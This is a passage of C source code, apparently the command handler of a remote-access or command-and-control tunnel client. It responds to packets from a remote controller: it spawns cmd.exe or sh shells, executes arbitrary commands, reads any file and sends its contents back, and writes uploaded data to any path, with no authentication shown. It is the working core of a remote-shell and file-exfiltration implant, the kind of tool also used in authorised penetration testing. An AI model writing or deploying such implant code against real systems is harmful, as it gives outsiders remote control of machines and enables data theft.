/* There can only be one driver_console, so store these as global variables. */ static SELECT_RESPONSE_t console_stdin_recv(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *d) { driver_console_t *driver_console = (driver_console_t*) d; message_post_data_out(driver_console->session_id, data, length); return SELECT_OK; }
static SELECT_RESPONSE_t exec_callback(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *param) { driver_exec_t *driver_exec = (driver_exec_t*) param; message_post_data_out(driver_exec->session_id, data, length); return SELECT_OK; }
static SELECT_RESPONSE_t client_recv(void *group, int socket, uint8_t *data, size_t length, char *addr, uint16_t port, void *c) { client_entry_t *client = (client_entry_t*) c; message_post_data_out(client->session_id, data, length); return SELECT_OK; }
static void handle_data_in(driver_command_t *driver, uint8_t *data, size_t length) { command_packet_stream_feed(driver->stream, data, length); while(command_packet_stream_ready(driver->stream)) { command_packet_t *in = command_packet_stream_read(driver->stream); command_packet_t *out = NULL; printf("Got a command: "); command_packet_print(in); if(in->command_id == COMMAND_PING && in->is_request == TRUE) { printf("Got a ping request! Responding!\n"); out = command_packet_create_ping_response(in->request_id, in->r.request.body.ping.data); } else if(in->command_id == COMMAND_SHELL && in->is_request == TRUE) { #ifdef WIN32 driver_exec_t *driver_exec = driver_exec_create(driver->group, "cmd.exe", in->r.request.body.shell.name); #else /* TODO: Get the 'default' shell? */ driver_exec_t *driver_exec = driver_exec_create(driver->group, "sh", in->r.request.body.shell.name); #endif out = command_packet_create_shell_response(in->request_id, driver_exec->session_id); } else if(in->command_id == COMMAND_EXEC && in->is_request == TRUE) { driver_exec_t *driver_exec = driver_exec_create(driver->group, in->r.request.body.exec.command, in->r.request.body.exec.name); out = command_packet_create_exec_response(in->request_id, driver_exec->session_id); } else if(in->command_id == COMMAND_DOWNLOAD && in->is_request == TRUE) { struct stat s; if(stat(in->r.request.body.download.filename, &s) != 0) { out = command_packet_create_error_response(in->request_id, -1, "Error opening file for reading"); } else { uint8_t *data; #ifdef WIN32 FILE *f = NULL; fopen_s(&f, in->r.request.body.download.filename, "rb"); #else FILE *f = fopen(in->r.request.body.download.filename, "rb"); #endif if(!f) { out = command_packet_create_error_response(in->request_id, -1, "Error opening file for reading"); } else { data = safe_malloc(s.st_size); if(fread(data, 1, s.st_size, f) == s.st_size) out = command_packet_create_download_response(in->request_id, data, s.st_size); else out = command_packet_create_error_response(in->request_id, -1, "There was an error reading the file"); fclose(f); safe_free(data); } } } else if(in->command_id == COMMAND_UPLOAD && in->is_request == TRUE) { #ifdef WIN32 FILE *f; fopen_s(&f, in->r.request.body.upload.filename, "wb"); #else FILE *f = fopen(in->r.request.body.upload.filename, "wb"); #endif if(!f) { out = command_packet_create_error_response(in->request_id, -1, "Error opening file for writing"); } else { fwrite(in->r.request.body.upload.data, in->r.request.body.upload.length, 1, f); fclose(f); out = command_packet_create_upload_response(in->request_id); } } else { printf("Got a command packet that we don't know how to handle!\n"); out = command_packet_create_error_response(in->request_id, 0xFFFF, "Not implemented yet!"); } if(out) { uint8_t *data; uint32_t length; printf("Response: "); command_packet_print(out); data = command_packet_to_bytes(out, &length); message_post_data_out(driver->session_id, data, length); } } }